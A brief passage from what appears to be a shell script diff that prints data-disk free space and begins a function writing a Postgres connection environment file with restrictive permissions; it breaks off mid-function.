awk '{print "data disk: "$4" free of "$2}' +} + +write_connection() { + local pw + pw=$(get_env POSTGRES_PASSWORD) + umask 077 + cat > "$DIR/crawlproof-connection.env" <